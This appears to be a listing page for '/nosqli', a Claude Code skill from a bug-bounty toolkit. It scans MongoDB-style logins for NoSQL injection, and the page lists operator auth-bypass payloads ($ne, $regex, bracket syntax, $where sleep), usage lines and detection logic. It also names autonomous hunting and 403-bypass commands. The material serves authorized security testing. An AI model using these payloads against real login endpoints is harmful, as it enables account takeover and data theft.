/nosqli
NoSQL injection scanner (MongoDB/Mongoose/operator-injection DBs) — auth bypass via $ne/$gt operators, bracket-syntax query injection, $where time-based blind. Usage: /nosqli --login <url> --user-field email --pass-field password
$ npx -y skills add shuvonsec/claude-bug-bounty --agent claude-codeHow it fires
How this command gets triggered: by you, by Claude, or both.
- Fires itselfClaude auto-loads it when your prompt matches the work.
- You can call itInvoke it directly when you want it.
- Slash command
/nosqli
Context preview
What this command does when you run it.
NoSQL injection scanner (MongoDB/Mongoose/operator-injection DBs) — auth bypass via $ne/$gt operators, bracket-syntax query injection, $where time-based blind. Usage: /nosqli --login <url> --user-field email --pass-field password
Command definition
nosqli.mddescription: NoSQL injection scanner (MongoDB/Mongoose/operator-injection DBs) — auth bypass via $ne/$gt operators, bracket-syntax query injection, $where time-based blind. Usage: /nosqli --login <url> --user-field email --pass-field password
/nosqli
Test JSON/operator-style NoSQL injection — the "db" attack surface web2 SQLi tools miss. Turns an equality check (`{user: X, pass: Y}`) into "match anything" via operator injection → auth bypass / data read.
Usage
/nosqli --login https://t/api/login --user-field email --pass-field password
/nosqli --login https://t/api/login --baseline-user a@a.co --baseline-pass wrong
/nosqli --query "https://t/api/items?id=1"
Run directly:
tools/nosqli_scanner.py --login https://t/api/login \
--user-field email --pass-field password --json
Techniques
| Technique | Payload | Confirms via | |---|---|---| | Operator auth-bypass | `{"email":{"$ne":null},"password":{"$ne":null}}` | response flips 401→200 / body-length jump | | Known-user wildcard | `{"email":"admin","password":{"$ne":""}}` | same | | `$regex` match-all | `{"$regex":".*"}` | same | | Bracket-syntax (Express/qs) | `email[$ne]=&password[$ne]=` | manual diff (emitted) | | `$where` time-based blind | `{"$where":"sleep(5000)"}` | response delay ≥ 3.5s |
How detection works
The scanner sends a **wrong-credential baseline** first, then each payload, and flags a finding when:
- status flips from 401/403 to 200/302, **or**
- body length changes by >25% (or >64 bytes) at the same status, **or**
- the `$where` sleep payload measurably delays the response (server-side JS eval = CRITICAL).
`--query` mode can't auto-confirm (no baseline), so it prints the bracket- injection variants for you to diff manually in Burp/Repeater.
Impact
Operator auth-bypass on a login = **account takeover / full auth bypass** (Critical). `$where` injection = server-side JS execution → often RCE-adjacent.
Read more
description: NoSQL injection scanner (MongoDB/Mongoose/operator-injection DBs) — auth bypass via $ne/$gt operators, bracket-syntax query injection, $where time-based blind. Usage: /nosqli --login <url> --user-field email --pass-field password
/nosqli
Test JSON/operator-style NoSQL injection — the "db" attack surface web2 SQLi tools miss. Turns an equality check (`{user: X, pass: Y}`) into "match anything" via operator injection → auth bypass / data read.
Usage
/nosqli --login https://t/api/login --user-field email --pass-field password /nosqli --login https://t/api/login --baseline-user a@a.co --baseline-pass wrong /nosqli --query "https://t/api/items?id=1"
Run directly:
tools/nosqli_scanner.py --login https://t/api/login \ --user-field email --pass-field password --json
Techniques
| Technique | Payload | Confirms via | |---|---|---| | Operator auth-bypass | `{"email":{"$ne":null},"password":{"$ne":null}}` | response flips 401→200 / body-length jump | | Known-user wildcard | `{"email":"admin","password":{"$ne":""}}` | same | | `$regex` match-all | `{"$regex":".*"}` | same | | Bracket-syntax (Express/qs) | `email[$ne]=&password[$ne]=` | manual diff (emitted) | | `$where` time-based blind | `{"$where":"sleep(5000)"}` | response delay ≥ 3.5s |
How detection works
The scanner sends a **wrong-credential baseline** first, then each payload, and flags a finding when:
- status flips from 401/403 to 200/302, **or**
- body length changes by >25% (or >64 bytes) at the same status, **or**
- the `$where` sleep payload measurably delays the response (server-side JS eval = CRITICAL).
`--query` mode can't auto-confirm (no baseline), so it prints the bracket- injection variants for you to diff manually in Burp/Repeater.
Impact
Operator auth-bypass on a login = **account takeover / full auth bypass** (Critical). `$where` injection = server-side JS execution → often RCE-adjacent.
AI-powered bug bounty hunting from your terminal - recon, 20 vuln classes, autonomous hunting, and report generation. All inside Claude Code.
Repo: shuvonsec/claude-bug-bounty
Other commands on claude-bug-bounty.
- /arsenal
Show which external bug-bounty tools are installed on this machine and print install hints for the missing ones. Curated from high-signal repos. Use to bootstrap a fresh box or audit which optional capabilities are wired in. Usage: /arsenal | /arsenal <tool-name>
Open command - /autopilot
Run autonomous hunt loop on a target — scope check → recon → rank surface → hunt → validate → report with configurable checkpoints. Usage: /autopilot target.com [--paranoid|--normal|--yolo]
Open command - /breach-check
HIBP k-anonymity check on a password wordlist. Enriches each password with its breach count, ranks DESC. Free API (no key), only first 5 chars of SHA-1 sent. Output -> <input>-ranked.txt. Usage /breach-check <wordlist> [--min-count N] [--max-count N] [--with-counts]
Open command - /bypass-403
Probe a 403/401 endpoint with the most-paid bypass tricks (header injection, path encoding, method swap, WAF fingerprint, vendor-specific). Wraps byp4xx when installed; otherwise runs a built-in matrix of 38+ techniques. Usage: /bypass-403 <url> | /bypass-403 -l <urls-file>
Open command - /chain
Build an exploit chain — given bug A, finds B and C to combine for higher severity and payout. Knows common chain patterns: IDOR→ATO, SSRF→cloud metadata, XSS→ATO, open redirect→OAuth theft, S3→bundle→secret→OAuth. Usage: /chain
Open command - /cloud-recon
Sweep cloud assets for a target — public S3/Azure/GCP buckets via S3Scanner and cloud_enum, plus CloudFlare-bypassed origin IPs via CloudFail (or built-in DNS-history fallback). Use --keyword for storage discovery and --cf-bypass to find an origin IP behind CloudFlare. Usage:
Open command

